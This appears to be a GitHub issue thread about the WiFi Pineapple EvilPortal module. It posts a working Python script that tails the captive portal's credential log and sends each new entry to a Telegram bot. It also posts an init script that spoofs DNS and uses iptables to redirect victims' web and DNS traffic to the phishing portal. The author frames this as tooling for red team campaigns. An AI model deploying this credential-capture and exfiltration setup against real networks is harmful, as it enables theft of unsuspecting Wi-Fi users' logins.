Open vay3t opened 2 years ago
req.txt
opkg install python3-pyinotify
/root/notify.py
import urllib.request
import urllib.parse
import sys
import pyinotify
import os.path
global lines
file_watcher = os.path.realpath("/www/.logs")
def count_lines(file_name):
with open(file_name) as f:
count = len(f.readlines())
return count
def tail_n(file_name, n):
with open(file_name) as f:
lines = f.readlines()
return lines[-n:]
def list2string(list):
return "".join(list)
def sender(msj):
if msj == "":
msj = "[EvilPortal]"
token = "<TOKEN>"
chat_id = "<CHAT_ID>"
url = f"https://api.telegram.org/bot{token}/sendMessage"
values = {
"chat_id": chat_id,
"text": msj
}
data = urllib.parse.urlencode(values)
data = data.encode('ascii')
req = urllib.request.Request(url, data)
urllib.request.urlopen(req)
# Example: monitors transient files.
#
# Run this code, then run transient_file.sh in another shell.
class ProcessTransientFile(pyinotify.ProcessEvent):
def process_IN_MODIFY(self, event):
global lines
# We have explicitely registered for this kind of event.
#print('\t', event.pathname, ' -> written')
lines_now = count_lines(file_watcher)
modified = tail_n(file_watcher, lines_now - lines)
print(list2string(modified))
lines = lines_now
sender(list2string(modified))
def process_default(self, event):
# Implicitely IN_CREATE and IN_DELETE are watched too. You can
# ignore them and provide an empty process_default or you can
# process them, either with process_default or their dedicated
# method (process_IN_CREATE, process_IN_DELETE) which would
# override process_default.
print('default: ', event.maskname)
lines = count_lines(file_watcher)
wm = pyinotify.WatchManager()
notifier = pyinotify.Notifier(wm)
# In this case you must give the class object (ProcessTransientFile)
# as last parameter not a class instance.
wm.watch_transient_file(file_watcher, pyinotify.IN_MODIFY, ProcessTransientFile)
notifier.loop()
/etc/init.d/evilportal
#!/bin/sh /etc/rc.common
# This is the auto-start script for EvilPortal
START=200
start() {
# Enable ip forward.
echo 1 > /proc/sys/net/ipv4/ip_forward
# Remove old authorized clients list
rm /tmp/EVILPORTAL_CLIENTS.txt
/etc/init.d/php7-fpm start
/etc/init.d/nginx start
# Start DNS MASQ to spoof * for unauthorized clients
dnsmasq --no-hosts --no-resolv --address=/#/172.16.42.1 -p 5353
# Symlink evilportal portal api
rm /www/captiveportal
ln -s /pineapple/ui/modules/evilportal/assets/api /www/captiveportal
# Run iptables commands
iptables -t nat -A PREROUTING -i br-lan -p tcp --dport 443 -j DNAT --to-destination 172.16.42.1:80
iptables -t nat -A PREROUTING -i br-lan -p tcp --dport 80 -j DNAT --to-destination 172.16.42.1:80
iptables -t nat -A PREROUTING -i br-lan -p tcp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
iptables -t nat -A PREROUTING -i br-lan -p udp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
sleep 10
python3 /root/notify.py &
}
stop() {
/etc/init.d/php7-fpm stop
/etc/init.d/nginx stop
kill $(netstat -plant | grep 5353 | awk '{print $NF}' | sed 's/\/dnsmasq//g' | head -n 1)
rm /www/captiveportal
iptables -t nat -D PREROUTING -i br-lan -p tcp --dport 443 -j DNAT --to-destination 172.16.42.1:80
iptables -t nat -D PREROUTING -i br-lan -p tcp --dport 80 -j DNAT --to-destination 172.16.42.1:80
iptables -t nat -D PREROUTING -i br-lan -p tcp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
iptables -t nat -D PREROUTING -i br-lan -p udp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
kill $(ps aux | grep notify.py | head -2 | awk '{print $2}')
}
disable() {
rm /etc/rc.d/*evilportal
}
weeeeeeeeena bayeton xuxetumare!!!
buena manito
Short story: Send captured credentials to telegram bot
A couple of years ago I made a bash script that helped me do a hot read of a file and every time that file was updated it sent a message from the telegram bot (https://vay3t.medium.com/creando-un-notificador-en-telegram-con-bash-b842490610)
With that idea I molded it to use it in the wifi pineapple and in this way have telegram notifications for red team campaigns.
/root/notify.sh
/root/hotreader.sh
/etc/init.d/evilportal
I would like to work more but I'm not very good at developing web applications
Notes: